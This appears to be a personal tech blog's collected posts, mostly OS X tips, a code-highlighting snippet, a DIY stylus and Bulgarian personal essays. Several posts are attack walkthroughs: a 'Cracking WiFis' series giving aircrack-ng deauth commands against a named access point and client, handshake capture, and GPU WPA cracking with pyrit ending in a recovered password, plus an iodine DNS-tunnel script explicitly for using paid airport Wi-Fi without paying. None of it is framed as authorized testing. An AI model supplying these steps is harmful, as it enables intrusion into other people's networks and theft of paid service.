Bootable USB with OS X Mountain Lion

Find the InstallESD.dmg
- either from App Store (Start installing Maverics (even if you are already on Maverics) and the location to the file is: /Applications/Install OS X Mavericks.app/Contents/SharedSupport/InstallESD.dmg
- you can also extract it from the Recovery Partition

Note: do not use the iso version and don't try to convert it. You will fail.

Then download http://liondiskmaker.com/ and follow the instructions.

highlight code (xml, javascript, java, php, c#....) in html

Screen Shot 2013-08-19 at 2.39.59 AM

How can one highlight (use a code color scheme) for source code or xml or html and do the following and do it in any html page?
Like this:
Screen Shot 2013-08-19 at 2.38.24 AM

One can use a javascript library. Instead of explaining how it works, here's the trick:

  <pre name="code" class="xml:nogutter:nocontrols">
    <?xml version="1.0" encoding="UTF-8"?>
      <urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"
              xmlns:news="http://www.google.com/schemas/sitemap-news/0.9">
          <url>
              <loc>http://www.kenoshanews.com/news/on_target_archer_sets_county_fair_record_472937185.html</loc>
                <news:news>
                  <news:publication>
                      <news:name>Kenosha News</news:name>
                      <news:language>en</news:language>
                  </news:publication>
                  <news:access>Subscription</news:access>
                <news:publication_date>2013-08-18</news:publication_date>
                <news:title>On target: Archer sets county fair record</news:title>
                </news:news>
          </url>
      </urlset>
  </pre>
  <link type="text/css" rel="stylesheet" href="http://syntaxhighlighter.googlecode.com/svn-history/tags/1.5.1/Styles/SyntaxHighlighter.css" />
  <script language="javascript" src="http://syntaxhighlighter.googlecode.com/svn-history/tags/1.5.1/Scripts/shCore.js"></script>
  <script language="javascript" src="http://syntaxhighlighter.googlecode.com/svn-history/tags/1.5.1/Scripts/shBrushXml.js"></script>
  <script language="javascript">
    dp.SyntaxHighlighter.HighlightAll('code');
  </script>

The important part is:

class="xml:nogutter:nocontrols"

xml = the language
nogutter, nocontrols = options
http://syntaxhighlighter.googlecode.com/svn-history/tags/1.5.1/ = I don't want to include these in my project, so I use them remotely, you can download them locally, but download all.
Add the js libraries for the languages you use. For xml I added shBrushXml (see the code).

Supported languages: https://code.google.com/p/syntaxhighlighter/wiki/Languages
Configuration options: https://code.google.com/p/syntaxhighlighter/wiki/Configuration

Really simple stylus (pen) for the iPhone

I have a friend with really long nails trying to play this game:

game

So she needs a stylus. How can I make her a DIY stylus for the iPhone?

There are these DIY clips online that require telescopic antennas, conductive sponges, glue and so on. How many of you have these things at home?

He're my solution:

I need a paperclip, a rubberband and cotton. That's it. The end result is this:

photo 3

  • Cotton can be substituted with toilet paper or a very small piece of sponge. (We need that in order to not scratch the screen).
  • The cotton has to be MOIST (WET). When it dries out it stops working.
  • The paperclip has to be unshielded with rubber. We need to conduct electricity for the capacitive touchscreen of the iPhone.
  • The cotton tip should be wider than the tip of a pen, otherwise it's not going to work.

How Apple distributes new versions of iOS: hashing, nonces, encryption

iOS

Apple distributes new versions of iOS by encrypting it. Before installation, the ECID (id) of the phone plus the hash of several files have to be signed by Apple's TSS service (a hashing service with a special Apple-owned private key). The signature is called a SHSH.

Jay Freeman, aka saurik is the developer behind Cydia an open source repository for iOS devices (iPhones).

bootrom

The bootrom (correct me if I'm wrong) of the phone allows installation of new OS versions only if the phone's ECID matches the one in the SHSH, and the hash of the new installation (the hash of several files actually) matches the one in the SHSH. The problem here is that Apple's TSS only signes current versions.
The bootrom hasn't been broken yet, so this SHSH mechanism cannot be avoided. It exists since iOS v.2.0

How can we install older versions of iOS?

Well, Mr. Freeman here created a database that caches all the SHSH's for all the phones that want that service for all the files in all the versions of iOS. A huge database. Apple limited the caching TSS service of Saurik (Mr. Freeman) - by IP filtering for example - and he distributed it, by putting the extraction of the SHSHs in the Cydia itself and then Cydia uploads them to this database.

The caching is possible, because the SHSH is monolithic.

APTicket

This is the new signature algorithm. It adds a slight but very significant change - a nonce. The nonce is a piece of garbage text (i.e. "fb*&h") that is added to the request the iPhone makes to the Apple's TSS service. For every new installation/update/restore of iOS, a new nonce is created (it's unique) and sent to TSS. Thus caching becomes pointless.

Why hasn't Apple used nonce all along?

It's hard to believe that Apple doesn't know how the SHSH caching can be fixed. I (not Saurik) assume that Apple wants to allow jailbreaking because the community demands it. They just want to delay it after every initial release of new device/OS. Jailbreaking brings open source, but it also brings pirated software and music.

Why I shared this?

A very detailed explanation on how to distribute securely desktop software with the help of encryption and a very sturdy (unbreakable) ROM on the phone itself.

The full article is here: http://www.saurik.com/id/15

 

Force Boot Camp into using an ISO image of Windows to create the USB flash drive (for Mountain Lion with updated Boot Camp)

Note: Check the comments section - there seems to be a very live Q&A discussion on the topic.

Boot Camp Assistant requires an Optical Drive with Windows installation in it so it can install Windows.

For Macbook Air and others it supports an ISO option and it creates an usb installer.

This is how you can force Boot Camp Assistant to support the latter option for Macbooks that are supposed to have optical drives but you don't or can't use it:

Get the following strings from System Information:

Screen Shot 2013-04-22 at 2.01.57 PM

 

Get the selected one and the second line also (MacBookPro8,2).

Save a backup:

sudo cp /Applications/Utilities/Boot\ Camp\ Assistant.app/Contents/Info.plist /Applications/Utilities/Boot\ Camp\ Assistant.app/Contents/Info.plist.bak

Edit with root permissions (either change the permissions of the file or sudo vi) the following file:

sudo nano /Applications/Utilities/Boot\ Camp\ Assistant.app/Contents/Info.plist

add your string (mine is MBP81.0047.B27):

        DARequiredROMVersions
 
                MBP81.0047.B27 
                IM41.0055.B08
                IM42.0071.B03
                IM51.0090.B03
                IM52.0090.B03
                IM61.0093.B01
                MP11.005C.B04
                MB11.0061.B03
                MBP11.0055.B08
                MBP12.0061.B03
                MM11.0055.B08

Then find the following:

        PreUSBBootSupportedModels
 
                MacBook7,1
                MacBookAir3,2
                MacBookPro8,3
                MacPro5,1
                Macmini4,1
                iMac12,2

REMOVE the "Pre" from the and add your computer as a string, mine is MacBookPro8,2:

        USBBootSupportedModels
 
                MacBookPro8,2
                MacBook7,1
                MacBookAir3,2
                MacBookPro8,3
                MacPro5,1
                Macmini4,1
                iMac12,2

Save and exit with <Ctrl+X>, Y, <Enter>

Change url file associations in OS X

There are many custom protocols where a command can be an URI.
For example ical://some_new_event or mailto:john@malkovich.com or magnet://
There are system wide associations in OS X, but there's no interface that can edit them. Only some applications can do that, but then the control is not in your hands. Here's how:

Download RCDefaultApp - this is a preference pane for System Preferences:

Screen Shot 2013-04-10 at 11.21.17 PM

The last one, when opened, looks like this:

Screen Shot 2013-04-10 at 11.21.46 PM

Change and save!

How to run ScanTool on Linux

ScanTool is an OBD data reader. Here's how you can run it on linux:

#!/bin/bash
#!/bin/bash
 
wget http://archive.ubuntu.com/ubuntu/pool/universe/s/scantool/scantool_1.21+dfsg.orig.tar.bz2
tar xjf scantool_1.21+dfsg.orig.tar.bz2
cd scantool-1.21
wget http://archive.ubuntu.com/ubuntu/pool/universe/s/scantool/scantool_1.21+dfsg.orig-dzcomm.tar.bz2
tar xjf scantool_1.21+dfsg.orig-dzcomm.tar.bz2
mv dzcomm-0.9.9i/ dzcomm
wget http://patch-tracker.debian.org/patch/series/dl/scantool/1.21+dfsg-3/dzcomm-usb-serial.patch
wget http://patch-tracker.debian.org/patch/series/dl/scantool/1.21+dfsg-3/scantool-linux-build.patch
wget http://patch-tracker.debian.org/patch/series/dl/scantool/1.21+dfsg-3/logging-newlines.patch
wget http://patch-tracker.debian.org/patch/series/dl/scantool/1.21+dfsg-3/drop-listports.patch
wget http://patch-tracker.debian.org/patch/series/dl/scantool/1.21+dfsg-3/allow-elm327-clones.patch
wget http://patch-tracker.debian.org/patch/series/dl/scantool/1.21+dfsg-3/drop-report-request.patch
wget http://patch-tracker.debian.org/patch/series/dl/scantool/1.21+dfsg-3/build-flags.patch
sed s_/usr/share/scantool/__ -i scantool-linux-build.patch
patch -p1 -i dzcomm-usb-serial.patch
patch -p1 -i scantool-linux-build.patch
patch -p1 -i logging-newlines.patch
patch -p1 -i drop-listports.patch
patch -p1 -i allow-elm327-clones.patch
patch -p1 -i drop-report-request.patch
patch -p1 -i build-flags.patch
cd dzcomm && sh ./fixunix.sh && ./configure && make depend && make lib; cd ..
make CFLAGS="-Idzcomm/include -DDZCOMM_DJGPP=1" LDFLAGS="-Ldzcomm/lib/unix"
cd ..
cp scantool-1.21/scantool .
cp scantool-1.21/scantool.dat .
cp scantool-1.21/codes.dat .
rm -rf scantool-1.21
rm scantool_1.21+dfsg.orig.tar.bz2

Courtesy goes to PePe.

Java allows a trailing comma when enumerating arrays and enum values?

public class Peshev {
    public static void main(String... args) {
        String[] fff = new String[]{"a", "b",};
        System.out.println(fff[0]+fff[1]);
    } 
}

Do you see the trailing comma after "b"? That's allowed. Unexpected from a strongly-typed lang as Java.

Can I watch 1080p torrents while they are still downloading on OS X? — YES (ver.2)

This is ver1 of this manual. Ver2 is updated with a better torrent client.

A 1080p movie is around 4 -8GB in size. Downloading this takes a while even on 50mbit connection.

What if it is possible to watch while downloading? So watching starts right away.

  • We need a torrent client that can download the movie file parts in order, not randomly.
  • We need a player that supports playing incomplete files.
  • We need a connection that is faster than the movie's bitrate.

The torrent client

Previously I used BitThief. It is developed by a technology institute in Zurich. It didn't have a polished GUI and took a little bit too much CPU while downloading.

The new client I found thanks to diimdeep. It is called qbittorrent and it is awesome.

Screen Shot 2013-03-17 at 9.24.31 PM

You can see that while downloading it downloads as a normal torrent client - the parts are downloaded randomly:

Screen Shot 2013-03-17 at 9.27.38 PM

But there is an option:

After that we can see that the rest of the file is being downloaded sequentially (blue - downloaded, green - requested):

The connection speed

How can we tell if the speed is good enough? By the estimated time of arrival (ETA):

If the movie is 1.5 hours and the ETA is 17 minutes, then the speed is sufficient.

The player

The player is and always has been mplayer. I use MplayerX because it comes with a nice OSX gui. Download and associate movie files with mplayer (avi, mkg):

Screen Shot 2013-03-17 at 9.45.59 PM

The final step is to to play the file after the downloading started:

That's it.

Screen Shot 2013-03-17 at 9.41.25 PM

Happy watching.

Cracking WiFis, the Apple way; part 3: OpenCL (or CUDA) and pyrit

(part1)
(part2)

Cracking the WPA password with aircrack is not fast, especially in a VM. So the first thing is to do the cracking outside of BackTrack. We have to get the .cap file out of the VM. Just drag it from the VM to the desktop.

Also using just the CPU is slow. GPUs these days can crack faster than the CPU.

X Code Command Line tools only

OS X Mountain Lion comes with OpenCL tools. X Code is big and most of it is iOS and OS X dev tools which we don't need. So only Command Line Tools can be installed. You have to have an Apple developer account to download it (it's free):

Screen Shot 2013-02-25 at 4.03.50 PM

Then:

Screen Shot 2013-02-25 at 4.03.29 PM

Click Next or Continue or whatever until it is done.

or X Code (full version)

Full X Code can be installed from the App Store:

Screen Shot 2013-02-24 at 10.43.40 PM

Then Command Line Tools have to be installed. Go to XCode, then Properties:

Screen Shot 2013-02-25 at 4.13.55 PM

Install Pyrit (AMD Radeon)

Pyrit is a python tool that cracks WPA passwords.

Prerequisites. Download these in a folder named PYRIT for example:

http://libdnet.googlecode.com/files/libdnet-1.12.tgz
http://dfn.dl.sourceforge.net/sourceforge/pylibpcap/pylibpcap-0.6.4.tar.gz
http://www.secdev.org/projects/scapy/files/scapy-latest.tar.gz

Then in the folder in terminal do:

tar -xzf  libdnet-1.12.tgz
cd libdnet-1.12
./configure
make
sudo make install
cd python
sudo python setup.py install
cd ../..
 
tar -xzf pylibpcap-0.6.4.tar.gz
cd pylibpcap-0.6.4
sudo python setup.py install
cd ..
 
tar -xzf scapy-latest.tar.gz
cd scapy-2.1.0
sudo python setup.py install
cd ..

Now, it's time for the pyrit tool:

svn checkout http://pyrit.googlecode.com/svn/trunk/ pyrit-read-only
 
cd pyrit-read-only
cd pyrit
sudo python setup.py install

Install Pyrit (NVidia)

Extra steps for NVidia:

Download nvidia driver from http://developer.nvidia.com/cuda/cuda-downloads.

If you don't have nvidia driver, you'll get: SystemError: Nvidia's CUDA-compiler 'nvcc' can't be found.

Check the first and second option:

Then:

cd ..
cd .. 
cd pyrit-read-only
cd cpyrit_cuda
sudo LDFLAGS=-L/usr/local/cuda/lib python setup.py install

Test Pyrit

On a macbook with ATI we get something like:

$ pyrit list_cores
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
 
The following cores seem available...
#1: 'OpenCL-Device 'ATI Radeon HD 6750M''
#2: 'CPU-Core (SSE2/AES)'
#3: 'CPU-Core (SSE2/AES)'
#4: 'CPU-Core (SSE2/AES)'
#5: 'CPU-Core (SSE2/AES)'
#6: 'CPU-Core (SSE2/AES)'
#7: 'CPU-Core (SSE2/AES)'
#8: 'CPU-Core (SSE2/AES)'

On a macbook with nVidia, we get something like:

$ pyrit list_cores
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
 
The following cores seem available...
#1: 'CUDA-Device #1 'GeForce 9400M''
#2: 'CPU-Core (SSE2)'

Note: I have no idea why when OpenCL or CUDA is installed it takes the place of one of the cores, on a quad-core we get 7 cores with OpenCL. When benchmarking it seems all cores are being utilized. I guess it's a bug.

Benchmarking

$ pyrit benchmark
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Running benchmark (7724.0 PMKs/s)... -
 
Computed 7723.98 PMKs/s total.
#1: 'OpenCL-Device 'ATI Radeon HD 6750M'': 7180.7 PMKs/s (RTT 2.7)
#2: 'CPU-Core (SSE2/AES)': 252.6 PMKs/s (RTT 3.8)
#3: 'CPU-Core (SSE2/AES)': 247.2 PMKs/s (RTT 3.9)
#4: 'CPU-Core (SSE2/AES)': 243.6 PMKs/s (RTT 4.0)
#5: 'CPU-Core (SSE2/AES)': 246.6 PMKs/s (RTT 3.9)
#6: 'CPU-Core (SSE2/AES)': 250.8 PMKs/s (RTT 3.8)
#7: 'CPU-Core (SSE2/AES)': 253.0 PMKs/s (RTT 3.8)
#8: 'CPU-Core (SSE2/AES)': 250.4 PMKs/s (RTT 3.9)

You can see that the GPU is faster than 7 cores (they should be 8, i don't know why one is missing)

Wordlists

Wordlists can be found here: http://blog.g0tmi1k.com/2011/06/dictionaries-wordlists.html

gfxCardStatus

Make sure you're in Discrete Only mode.

Screen Shot 2013-02-25 at 12.38.06 AM

Otherwise pyrit will complain:

Exception in thread OpenCL-Device 'ATI Radeon HD 6750M':
[...]
SystemError: Failed to create command-queue (CL_INVALID_VALUE)
[...]
SystemError: The core 'OpenCL-Device 'ATI Radeon HD 6750M'' has died unexpectedly

Cracking with Pyrit

$ pyrit -r ~/Steve-01.cap --all-handshakes -i ~/WORDLISTS/4.9gb/BIG-WPA-LIST-1.txt attack_passthrough
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
 
Parsing file '/Users/c00l/Desktop/Steve-01.cap' (1/1)...
Parsed 3539 packets (3539 802.11-packets), got 115 AP(s)
 
Picked AccessPoint 00:0f:01:37:1a:a0 ('Steve') automatically.
Attacking 20 handshake(s).
Tried 140007 PMKs so far; 7550 PMKs per second.
 
The password is 'forzajuve'.

--all-handshakes means that all handshakes in the file will be used together.

It will utilize the CPU and the GPU simultaneously. And now we get around 10k attempts/sec which is a lot better than aircrack-ng in a vm.

Note: your computer will unresponsive, make sure anything CPU or GPU intensive is switched off.

Some stuff was taken from here.

Check the wifis category for more tutorials.

Cracking WiFis, the Apple way; part 2: deauth attack; cracking WPA with aircrack-ng

(Go to part1)

Let's check the wi-fis:

# airodump-ng mon0

The Deauth attack

Now we choose which AP to attack. Let's choose Steve. The --bssid parameter says which AP to listen for, -c says on which channel should we stay and -w says the file we use to dump the authentication.

# airodump-ng mon0 --bssid 00:0F:01:37:1A:A0 -c 2 -w Steve.cap

Screen Shot 2013-02-24 at 9.35.15 PM

This attack is called the Deauth attack because we de-authenticate one client and wait for it to reconnect. -a is the AP, -c - the client we deauth, -0 is the attack, 1 means to perform it once only.

# aireplay-ng mon0 -0 1 -a 00:0F:01:37:1A:A0 -c F0:D1:A9:AE:E7:A5

Screen Shot 2013-02-24 at 9.38.43 PM

And we get the handshake.

Now we crack it. We will use a wordlist.

# aircrack-ng Steve-01.cap -w /pentest/passwords/wordlists/rockyou.txt

 

if the password is in the wordlist, then

Unfortunately this method can try only ~800 passwords per second from the wordlist. In later articles we'll see better approaches.

 

Cracking WiFis, the Apple way; part 1: external card, backtrack, aircrack-ng, the VM

OS X natively is no good

First, trying to crack wi-fi APs on OS X natively will not work great. KisMAC is not great, it cannot inject packets with the macbook's default wi-fi card. aircrack-ng does not work.

The usb wi-fi card

So to inject stuff, an external USB wi-fi is required. I have tried ALFA AWUS036NEH (chipset Ralink RT3070) and TP-Link TL-WN722N (chipset Atheros AR9271).

ALFA's are recommended by half the internet, but I think they suck. My Alfa is not stable, it doesn't work with BT5R3, only BT5R2. The Atheros is a lot better, but no 5Ghz. I'm waiting for NETGEAR WNDA3200 which has 5Ghz radio that works simultaneously with the 2.4Ghz radio.

The VM

The best VM to use is BackTrack - all the cracking tools are inside. Latest version is BT5R3. It even comes as a prebuilt VMware virtual machine. I'm using VMware Fusion on OS X.

(user: root, pass: toor; startx to launch gnome):

Adding the card to the USB:

Screen Shot 2013-02-24 at 8.08.52 PM

Then in terminal we check for a wi-fi card. We find one on wlan1 and start a monitoring interface for it.

# airmon-ng
# airmon-ng start wlan1
# airmon-ng

Then, let's check the wi-fis:

# airodump-ng mon0

In later articles we'll see how to hack the wi-fi.

order of magnitude

root# ./john --test -format=wpapsk-opencl
OpenCL platform 0: Apple, 2 device(s).
Using device 1: <strong>ATI Radeon HD 6750M</strong>
Benchmarking: WPA-PSK PBKDF2-HMAC-SHA-1 [OpenCL]... DONE
Raw: 12126 c/s real, 87771 c/s virtual
 
root# ./john --test -format=wpapsk-opencl --device=0
OpenCL platform 0: Apple, 2 device(s).
Using device 0: <strong>Intel(R) Core(TM) i7-2820QM CPU @ 2.30GHz</strong>
Benchmarking: WPA-PSK PBKDF2-HMAC-SHA-1 [OpenCL]... DONE
Raw: 1192 c/s real, 156 c/s virtual

Reset the "Open with" database on OS X

Sometimes there are a lot of VMware Fusion items left over in the "Open with" dialog.

Here's how to rebuild the "Open with" database:

dude$ /System/Library/Frameworks/CoreServices.framework/Frameworks/LaunchServices.framework/Support/lsregister -kill -r -domain local -domain system -domain user
dude$ killall Finder

Make a bootable USB from ISO on OS X Mountain Lion 10.8 without any extra apps

Plugin the USB, then:

Screen Shot 2013-02-17 at 3.28.33 PM

 

 

Then

mf$ hdiutil convert -format UDRW -o BT5R2-GNOME-64.img BT5R2-GNOME-64.iso
mf$ diskutil list /dev/disk2 #(careful here)
mf$ dd if=./BT5R2-GNOME-64.img.dmg of=/dev/rdisk2 bs=1m

 

Note: that bs=1m (without it the speed is going to be less than 1mb/sec, with it it's 10mb/sec)

Note2: we're using rdisk2 instead of disk2, again this way it's faster.

Iodined - how to use free internet on airports

How to get internet connectivity on an open wi-fi access point that requires a credit card without actually paying:

Prerequisites

  • OpenWRT router
    • public ip, not necessarily static
  • account on dns.he.net
  • OS X laptop

Iodine on OpenWRT and installation on a OS X

On the OpenWRT:

  • opkg install iodined
  • update /etc/init.d/iodined to:

[dropdown_box expand_text="code" show_more="Show" show_less="Hide" start="hide"]

#!/bin/sh /etc/rc.common
# Copyright (C) 2006-2011 OpenWrt.org

START=50

start_instance () {
local section="$1"
config_get address  "$section" 'address'
config_get password "$section" 'password'
config_get tunnelip "$section" 'tunnelip'
config_get tld      "$section" 'tld'

service_start /usr/sbin/iodined -l "$address" -c -s -P "$password" $tunnelip "$tld" &
sleep 1
ifconfig dns0 $tunnelip netmask 255.255.255.0
}

start() {
config_load 'iodined'
config_foreach start_instance 'iodined'
}

stop() {
service_stop /usr/sbin/iodined
}

[/dropdown_box]

  • so that it starts automatically
/etc/init.d/iodined enable
  • edit /etc/config/iodined (because there' s a bug on openwrt)
    • change address to 192.168.14.1
config iodined
 option address ''
 option password ''
 option tunnelip '192.168.14.1'
 option tld ''
  • Make sure the openwrt router has a static ip address (he.net provides dyndns updates)
  • Make a dns zone: a.server.com ns -> openwrt.server.com
    • openwrt.server.com has a dyndns update
  • port forward 53 (tcp and udp) from first router to second router (or just open 53 on the openwrt)

osx client

  • http://tuntaposx.sourceforge.net/ (tuntap)
  • script:

[dropdown_box expand_text="code" show_more="Show" show_less="Hide" start="hide"]

#!/bin/bash

# are we root?
if ! [ $UID == 0 ] ; then
  echo "IODINE SETUP: use 'sudo $0'";
  exit 0;
fi;

#$1 says whether we use clearcode or stoynov.com
if [ -z $1 ] ; then
  echo 'IODINE SETUP: first param must be 1(i.clearcode.org) or 2(i.stoynov.com)';
  exit 0;
fi;

if [ $1 == 1 ] ; then
  endpoint_domain='i.clearcode.org'
  endpoint_net='192.168.14.0/24'
  endpoint_gw='192.168.14.1'
fi;

if [ $1 == 2 ] ; then
  endpoint_domain='j.stoynov.com'
  endpoint_net='192.168.15.0/24'
  endpoint_gw='192.168.15.1'
fi;

# get the first dns from resolv.conf and use it.
abused_nameserver=`cat /etc/resolv.conf | grep nameserver | head -1 | awk '{print $2}'`
abused_nameserver=8.8.4.4
echo ">>>>>>>>>>>>>>>>>>>USING DNS: $abused_nameserver"

# kill iodine if any and remove old routes
killall iodine
route delete 8.8.8.8 > /dev/null
route delete 8.8.4.4 > /dev/null

# get the default gateway for iodine
default_gateway=`netstat -rn | grep default | awk '{print $2}'`

#when I die, restore the default gateway, use trap to get Ctrl+C
function disconnect() {
  # kill the process with id coming as a parameter
  kill -9 $1;
  route add default $default_gateway;
}
#disconnect and exit
function cleanup() {
  disconnect $(pgrep iodine);
  exit 0;
}
trap "cleanup" SIGINT

#dns query types
dns_query_types="TXT CNAME NULL"

function connect() {
  # start iodine (possible dns types are CNAME, TXT, NULL), -F puts a pid file with the processId inside
  iodine_output=$(./iodine -T CNAME -r -P "peshev sucks" -F /var/run/iodine.pid $abused_nameserver $endpoint_domain 2>&1 | tee /dev/tty)

  #remote_net from iodine_output
  remote_net=$(echo $iodine_output | grep -o "Adding route [0-9\.]*/[0-9]\{1,2\} to [0-9\.]*" | awk '{print $3}')  

  #remote_net is something like 192.168.15.2/27 and should be 192.168.15.0/27
  remote_net=$(./ipcalc -nb $remote_net | grep Network | awk '{ print $2}')

  #tunX_ip (tunX_ip) from iodine_output
  tunX_ip=$(echo $iodine_output | grep -o "Adding route [0-9\.]*/[0-9]\{1,2\} to [0-9\.]*" | awk '{print $5}')

  #remote_gateway (gateway on iodine) from iodine_output
  remote_gateway=$(echo $iodine_output | grep -o "Server tunnel IP is [0-9\.]*" | awk '{print $5}')

  # route to nameserver to be abused
  route add -host $abused_nameserver $default_gateway
  # route to remote network via tunX_ip (necessary because my mac sucks)
  route add -net $remote_net $tunX_ip
  # change default gateway from system default to iodine 
  route delete default
  route add default $remote_gateway

  # time to download 100kb file in seconds (1.34). We remove the dot for easy comparison (1.34 -> 134)
  echo TESTING SPEED;
  t=$( { time -p curl -s ftp://speedtest:speedtest@ftp.otenet.gr/test100k.db; } 2>&1 )
  seconds=$(echo $t | awk '{ print $2;}' | tr -d . );
  echo SECONDS: $seconds;
}  
connect;

echo 'READY...READY...READY...READY...READY...'

while true; do sleep 10000; done;

[/dropdown_box]

  •  add ipcalc because the script needs it: ipcalc

Conclusion

Some testing found out speeds like 7-15 kb/s, sometimes less on 8.8.8.8 and 8.8.4.4. With local DNS servers the speeds are like 100kb/s. More testing is necessary.

Force Integrated graphics on VMware Fusion (and probably other apps) on OS X 10.8 Mountain lion (avoid discrete graphics)

With OS X 10.8 gfxCardStatus is no longer capable of enforcing Integrated Graphics card only.

When one uses VMWare Fusion, the discrete graphics card is enforced, which drains the battery too fast.

I have not found any solution online to fix this. But I managed (thanks to PePe) to discover one.

How to use Integrated Graphics Card with VMware Fusion on OS X 10.8:

  • Install gfxCardStatus
  • Before launching VMware Fusion, click on Integrated only (click it several times until it has the checkbox on the Integrated only):

Screen Shot 2013-02-15 at 2.05.32 PM

  • Then launch VMWare Fusion, start whatever virtual machine. And don't do anything inside. Leave it idle.
  • There's a BackTrack 5 R3 with the integrated graphics card:

Screen Shot 2013-02-15 at 2.08.15 PM

  • There's a BackTrack 5 R3 VM and a Windows XP (both idle) with the integrated graphics card:

Screen Shot 2013-02-15 at 2.12.34 PM

  • I'm using iStatMenus to check my power consumption. Here's my power consumption with the two VMs:

Screen Shot 2013-02-15 at 2.07.10 PM

  • Cody Krieger (the creator of gfxGraphicsStatus) says that even if it says that the Integrated is being used, the Discrete (NVidia) is still being powered on, which invalidates the whole exercise.
  • How do I know that I'm saving power? Well, let's go to Discrete and check the power consumption:

Screen Shot 2013-02-15 at 2.16.56 PM -> discrete

  • Now, let's check what the consumption is (the same two idle VMs):

 Screen Shot 2013-02-15 at 2.20.26 PM

 

  • So instead of having 3:27 hours left, I now have 1:22 hours left. My consumption 2.5 Amp, instead of 1.1 Amp.
  • I can't directly go back though:

Screen Shot 2013-02-15 at 2.27.07 PM

  • What I have to do is to stop VMware completely (Cmd + Q), go to Integrated only again and restart all the VMs
  • This is something that I discovered today. So it may not be working as expected, but for now it seems it is.
  • My setup:
    • OS X 10.8.2 on a Macbook Pro 8.2 (A1286, Quad Core i7 2.3 Ghz, 16gb RAM, 256gb OCZ Vertex 3, AMD Radeon HD 6750M 1GB)
    •  VMware Fusion 5.0.1 with 2 VMs - Windows XP Pro and Backtrack 5 R3 (both were idle during this setup).

 

Mirroring options in OS X mountain lion.

Note to me:
They took away my displays menu, but I got it back.
http://displaymenu.milchimgemuesefach.de

Keywords: mirroring displays, os x, mountain lion, display settings, external monitor....

option-brightness: Display Preference Pane
command-decrease-brightness: Change display mode (only on revised fn keyboard layout on Alu. keyboards, newer MBP/MBs?

https://discussions.apple.com/thread/4156736?start=0&tstart=0

Compromise? Hell NO

Та значи в човешките отношения винаги има търкания. И когато се стигне до такива, ти се казва: ами причината е еди коя си привичка в характера на човека отсреща. Ти си по-зрял, видял си го по-ясно, направи компромис, устискай докато другия узрее. Ето оттук се коренят 3/4 от проблемите в общуването. Добре де - в моето общуване.
Според мен от това "устискай", "направи компромис" следват голяма част от недоразуменията.
Защо? Защото първо, това привлича хора, които не са достатъчно "узрели" и усещат/знаят, че ще получат известна доза търпение. Второ, създава дисбаланс в отношенията, които "неузрелите нежелаят" да компенсират на по-късен етап. Този дисбаланс некомпенсиран оставя доста горчив вкус в устата. Те са свикнали отсрещната страна да е търпелива.
Оказва се, че търпението в тоя случай е най-лошият подход. А търпението е като универсално качество, винаги положително качество. Ами да, ама не. В този случай само се отлага неизбежното.
Освен това, защо просто не общуваме с хора, към които е нужно да се правят по-малко компромиси?!

Куфарът

Пътувам доста от 20тата си годишнина - по работа. С прекъсвания разбира се. Даже за кратко съм поживявал в чужбината. Доста съм понаучил относно това как се пътува най-ефективно. Все още не съм спец и постоянно обърквам нещо дребно, забравям разни неща или просто не преценявам.

Първият ми куфар беше един евтин платнен такъв. Биде съдран и съсипан само за няколко пътувания. Виждал съм как ги разсипват по пистата на софийското летище и просто продължават без да спират. След това реших да си купя пластмасов такъв. Но нямах пари за самсонайт, затова отидох в Метро. Там за 100тина кинта (още помня цената) си купих сегашния куфар. Огромен, сив, с код за отваряне на основната ключалка и ключе за двете странични. Изгубил съм едното ключе. Кодът не е сменян откак го имам.

Куфарът е 4 колела отдолу, задни големи и две предни завиващи. Има въже за дърпане и дръжка, за да се движи само на две колела. Въженцето за дърпане е жестоко, защото така тежестта на куфара не се отразява на пътника, тоест на мен.

В най-тежките случаи куфарът пълен е тежал над 30 кила - първото ми пътуване до щатите. Горкият. Как съм го претъпквал навръщане от Германия. Даже веднъж едно бъги с дистанционно помня съм връщал. От целият този тормоз предните две колела са счупени. Опитах да го поправя, но се оказа, че няма къде. Никой не може да поправи тези 2 колела.

Преди няколко седмици влязох в един магазин на Самсонайт. Разни сплави. Дават ти да скачаш върху куфара и после материята сама се изправя. Магия. Ама вътре лаптопът няма да се изправи. Та не си купих нов куфар със здрави колелца.

Понякога мъкненето с дръжката на две колелца ми тежи, но въженцето вече не е опция, заради разбитите предни колела. Понякога горната страна не се задържа като го отворя и се катурва назад. Всичко останало обаче работи. След почти 10 години.

Само тая година куфарът е бил на 3 континента, поне 10 държави.

Особено като пътувах до Германия, толкова бях свикнал да живея в тоя куфар. Дори не го разопаковах. Беше 2 седмици там, 2 седмици в България. Нямаше смисъл за 2 седмици да разопаковам.

Свикнах да живея с толкова малко вещи, че като тръгна на път да мога всичките да ги натъпча в тоя куфар и една раница с лаптоп. Ама всичките вещи. Откак свикнах така, се старая да не си купувам твърде много излишни вещи. И всяка вещ, която имам да се употребява. Струва ми се тъпо да имам вещи, които не ползвам. На това ме научи тоя куфар. НЕ искам да го сменям с друг. Само да успея да му оправя колелцата. Някой с идеи?

Тук съм малко въздебеличък, но това е единствената снимка, която имам на тоя куфар.

 

HP Director, HP Scan for OS X do not support cyrillic

Scanning a document in HP Scan (part of HP Director - the drivers for my printer in OS X) is tricky - the document cannot be saved in a folder with a long name, name in cyrillic; filename must be <24 chars long, cannot contain cyrillic. I spent 10 minutes trying to guess where the problem is. I am disappointed. This is for future reference. I know I will forget about this eventually, but I hope I will be smart enough to check here for the solution

Google is attacking Gmail?!

I have one gmail account configured to access another gmail account.

Now, here comes the fun part - how to fix it.

I logged with the other account (the one google claims is hacked) and I got a message similar to this one:

Then:

And then I have to click Yes:

And then I have to log in quickly.

Weird. Google migrated to this security protocol without notifying me. I have this new application style log in on my primary account, but not on the "cracked" one.

OS X Mountain Lion

I installed the "new" OS X - Mountain Lion - 10.8. This is the more un-hyped version of the operating system. The only usable features I found were Notes and Notifications sync with my iPhone, so far they work good enough.

Speech recognition integration is good. Recognition actually happens on an apple server which sucks especially with no internet connection.

Unsigned pkg files are harder to to install. An option has to be changed.

